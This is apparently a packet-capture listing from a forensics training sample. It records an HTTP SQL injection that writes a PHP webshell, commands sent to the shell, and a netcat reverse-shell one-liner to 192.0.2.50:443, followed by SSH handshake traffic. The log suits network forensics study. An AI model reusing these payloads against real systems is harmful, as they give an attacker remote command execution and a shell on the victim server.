Text Example

Webshell shell.php Command Access SSH Server PCAP Analysis File Download

Attachment: 1 pcap 37 (4 MB, added May 24, 2019 by admin)

2018-10-14 12:34:34.199552 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 1:334, ack 1, win 229, options [nop,nop,TS val 769026432 ecr 738855], length 333: HTTP: GET /edit_type.php?type_id=-5%20union%20select%20%22%3C?php%20echo%20shell_exec($_GET['cmd']);?%3E%22%20into%20outfile%22/var/www/docs/shell.php%22--%20 HTTP/1.1
E…XA@.?……2
..d…P…f{J.I…..F…..
-.i…F’GET /edit_type.php?type_id=-5%20union%20select%20%22%3C?php%20echo%20shell_exec($_GET['cmd']);?%3E%22%20into%20outfile%22/var/www/docs/shell.php%22--%20 HTTP/1.1
Host: 10.1.2.100
Connection: keep-alive
Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.9.1

2018-10-14 12:34:34.199573 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [.], ack 334, win 1944, options [nop,nop,TS val 738856 ecr 769026432], length 0
E..4.a@.@…
..d…2.P..{J.I……………
..F(-.i.
2018-10-14 12:34:34.202294 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 1:996, ack 334, win 1944, options [nop,nop,TS val 738856 ecr 769026432], length 995: HTTP: HTTP/1.1 200 OK
E….b@.@.|.
..d…2.P..{J.I……………
..F(-.i.HTTP/1.1 200 OK
Date: Sun, 14 Oct 2018 16:34:34 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 586
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

2018-10-14 12:34:34.210976 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 334:545, ack 996, win 244, options [nop,nop,TS val 769026434 ecr 738856], length 211: HTTP: GET /docs/shell.php?cmd=whoami HTTP/1.1
E…XC@.?……2
..d…P….{J.,………..
-.i…F(GET /docs/shell.php?cmd=whoami HTTP/1.1
Host: 10.1.2.100
Connection: keep-alive
Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.9.1

2018-10-14 12:34:34.220266 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 996:1295, ack 545, win 2078, options [nop,nop,TS val 738861 ecr 769026434], length 299: HTTP: HTTP/1.1 200 OK
E.._.c@.@…
..d…2.P..{J.,……………
..F–.i.HTTP/1.1 200 OK
Date: Sun, 14 Oct 2018 16:34:34 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 29
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html

……….+//.MI,I…..@f …
2018-10-14 12:34:34.263625 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [.], ack 1295, win 260, options [nop,nop,TS val 769026448 ecr 738861], length 0
E..4XD@.?……2
..d…P….{J.W…..S…..
-.i…F-
2018-10-14 12:34:37.227759 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 545:772, ack 1295, win 260, options [nop,nop,TS val 769027189 ecr 738861], length 227: HTTP: GET /docs/shell.php?cmd=cat%20/etc/lsb-release HTTP/1.1
E…XE@.?……2
..d…P….{J.W….6……
-.lu..F-GET /docs/shell.php?cmd=cat%20/etc/lsb-release HTTP/1.1
Host: 10.1.2.100
Connection: keep-alive
Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.9.1

2018-10-14 12:34:37.233154 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 1295:1662, ack 772, win 2212, options [nop,nop,TS val 739614 ecr 769027189], length 367: HTTP: HTTP/1.1 200 OK
E….d@.@..Y
..d…2.P..{J.W…i…..,…..
..I.-.luHTTP/1.1 200 OK
Date: Sun, 14 Oct 2018 16:34:37 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 97
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html

2018-10-14 12:34:52.294903 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 1657:1941, ack 2981, win 337, options [nop,nop,TS val 769030955 ecr 742627], length 284: HTTP: GET /docs/shell.php?cmd=/bin/bash%200%3C/var/tmp/pipe%20%7C%20nc%20192.0.2.50%20443%201%3E/var/tmp/pipe HTTP/1.1
E..PXO@.?……2
..d…P….{J…..Q…….
-.{+..T.GET /docs/shell.php?cmd=/bin/bash%200%3C/var/tmp/pipe%20%7C%20nc%20192.0.2.50%20443%201%3E/var/tmp/pipe HTTP/1.1
Host: 10.1.2.100
Connection: keep-alive
Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.9.1

2018-10-14 12:34:52.307291 IP 10.1.2.100.45298 > 192.0.2.50.443: Flags [S], seq 3484359733, win 14600, options [mss 1460,sackOK,TS val 743383 ecr 0,nop,wscale 3], length 0
E.. 10.1.2.100.45298: Flags [R.], seq 0, ack 3484359734, win 0, length 0
E..(..@.?..H…2
..d………..6P…B………
2018-10-14 12:34:52.309383 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 2981:3271, ack 1941, win 2882, options [nop,nop,TS val 743383 ecr 769030955], length 290: HTTP: HTTP/1.1 200 OK
E..V.i@.@…
..d…2.P..{J………B…….
..W.-.{+HTTP/1.1 200 OK
Date: Sun, 14 Oct 2018 16:34:52 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html

2018-10-14 12:54:51.821265 IP 10.1.2.100.22 > 10.1.3.100.49220: Flags [P.], seq 1:40, ack 1, win 1825, length 39
E..O..@.@.+5
..d
..d…D….g…P..!….SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1

2018-10-14 12:54:51.827631 IP 10.1.3.100.49220 > 10.1.2.100.22: Flags [P.], seq 1:497, ack 40, win 256, length 496
E…#.@…..
..d
..d.D..g…….P….5..SSH-2.0-PuTTY_Release_0.70
…L…U.4|..m..u~……..curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,rsa2048-sha256,rsa1024-sha1,diffie-hellman-group1-sha1…Wssh-ed25519,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-rsa,ssh-dss….aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-ctr,aes192-cbc,aes128-ctr,aes128-cbc,chacha20-poly
2018-10-14 12:54:51.827650 IP 10.1.3.100.49220 > 10.1.2.100.22: Flags [P.], seq 497:1133, ack 40, win 256, length 636
E…#.@…..
..d
..d.D..g…….P…s…1305@openssh.com,blowfish-ctr,blowfish-cbc,3des-ctr,3des-cbc,arcfour256,arcfour128….aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-ctr,aes192-cbc,aes128-ctr,aes128-cbc,chacha20-poly1305@openssh.com,blowfish-ctr,blowfish-cbc,3des-ctr,3des-cbc,arcfour256,arcfour128….hmac-sha2-256,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-etm@openssh.com….hmac-sha2-256,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-etm@openssh.com… none,zlib… none,zlib……………..
2018-10-14 12:54:51.827709 IP 10.1.2.100.22 > 10.1.3.100.49220: Flags [.], ack 497, win 1959, length 0
E..(..@.@.+[
..d
..d…D….g…P…….
2018-10-14 12:54:51.827744 IP 10.1.2.100.22 > 10.1.3.100.49220: Flags [.], ack 1133, win 2118, length 0
E..(..@.@.+Z
..d
..d…D….g..-P..F….
2018-10-14 12:54:51.828554 IP 10.1.2.100.22 > 10.1.3.100.49220: Flags [P.], seq 40:1024, ack 1133, win 2118, length 984
E…..@.@.’.
..d
..d…D….g..-P..F…….. ..*3.3…p.V#.$……ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1…#ssh-rsa,ssh-dss,ecdsa-sha2-nistp256….aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se….aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se….hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-sha2-256,hmac-sha2-256-96,hmac-sha2-512,hmac-sha2-512-96,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96….hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-sha2-256,hmac-sha2-256-96,hmac-sha2-512,hmac-sha2-512-96,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96….none,zlib@openssh.com….none,zlib@openssh.com………………….
2018-10-14 12:54:51.839985 IP 10.1.3.100.49220 > 10.1.2.100.22: Flags [P.], seq 1133:1213, ack 1024, win 252, length 80
E..x#.@…..
..d
..d.D..g..-..”.P….R…..L…..A……E……E0
